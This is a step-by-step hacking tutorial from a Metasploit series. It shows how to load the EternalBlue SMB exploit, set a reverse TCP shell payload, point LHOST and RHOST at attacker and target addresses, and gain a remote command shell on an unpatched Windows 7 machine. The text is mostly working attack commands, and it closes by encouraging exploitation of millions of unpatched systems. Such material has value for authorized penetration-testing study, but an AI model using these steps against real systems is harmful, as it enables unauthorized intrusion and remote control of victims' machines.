Welcome back, my aspiring hackers!
The Metasploit framework has become a multipurpose pentesting tool--but at its heart--it's an exploitation tool. Up to this point in this series on Metasploit, we have been getting familiar with the various aspects of this tool, but now we will get to the best part, exploitation of another system!
In part 7 of this series, we added a module. Very often new modules are developed that are not part of the base installation, nor are they part of the updates (msfupdate). That is the case with the NSA's EternalBlue exploit (at least as of this writing). When that happens, we need to add the module manually, as we did in part 7.
Now that we have EternalBlue in our Metasploit Framework, we can use it to exploit a Windows 7 or Windows Server 2008 system. In this case, I have an unpatched Windows 7x64 (it is estimated that approximately 50% of all Windows 7 systems are still unpatched) operating system that I will be testing the NSA's EternalBlue exploit on.
Let's get hacking!
Step #1 Fire up Kali and Start the msfconsole
The first step , as always, is to fire up Kali and start the Metasploit console.
kali > msfconsole
Step #2 Use Eternal Blue
Once you have the "msf >" prompt, you are ready to start exploiting your target system. We need to first load the EternalBlue exploit module into the Metasploit console. We can do this by entering;
msf > use exploit/windows/smb/ms17_010_eternalblue
If you loaded this module properly from part 7 of this series, you should see a prompt like that above. If it comes back with "failed to load module", you have not properly loaded the EternalBlue module. Go back to Part 7 and load the EternalBlue module.
Step #3 Check "Info"
When I first load a module, the first thing I typically do is check it's "info". This provides us with information that I will likely need to use the module, as well as information about how the module works.
msf > info
As you can see above, Metasploit provides us with some basic information (Name, Platform, Privileged, Rank, etc.) on the module at the top, some options in the middle (not shown) and a description of the module at the bottom (below).
Step #4 Set the Payload
Now that we have loaded our module and have some basic information on it , it is time to select a payload to work with it. To see all the payloads that will work with this module, you can enter;
msf > show payloads
It's important to note that the "show payloads" command run after selecting the exploit will only show you the payloads that will work with that exploit. If you run it before selecting your exploit, it will show you ALL the payloads.
In this example, I will be using our tried and true generic/shell_reverse_tcp payload, but you can use any of the others that appear on your payload list. If we are successful with this payload, it will provide us with a Windows command shell on our target system.
msf > set payload generic/shell_reverse_tcp
Step #5 Set Options
The last step before we exploit is to set our options. To see which options we have with this exploit and payload combination, enter;
msf > show options
As you can see, there are numerous options, but the only options we need to set are LHOST (our IP) and the RHOST (the target IP).
msf > set LHOST 192.168.1.101
msf > set RHOST 192.168.1.103
After setting those options, let's once again check the options to make certain everything was typed properly and that everything we need is set.
msf > show options
Step #6 Exploit!
Everything appears to be in order, so all that is left now is to exploit that Windows 7 system!
msf > exploit
As you can see above, Metasploit and EternalBlue are attempted to exploit the Windows 7 SMB protocol. Down below you can see that Metasploit reports back that we are successful and we received a Windows command prompt on the target system. Success!
To verify that we are now on the Windows system, let's type "dir" to see whether it displays Windows files and directories.
Metasploit framework is an essential tool in nearly every hacker/pentester's toolbox. At its heart, it is an exploitation framework with exploits, payloads and auxiliary modules for all types of systems. When the EternalBlue exploit is added, it now empowers us to exploit the millions of unpatched Windows 7 and Windows 2008 systems on the planet!
Look for my upcoming book "Metasploit Basics for Hackers".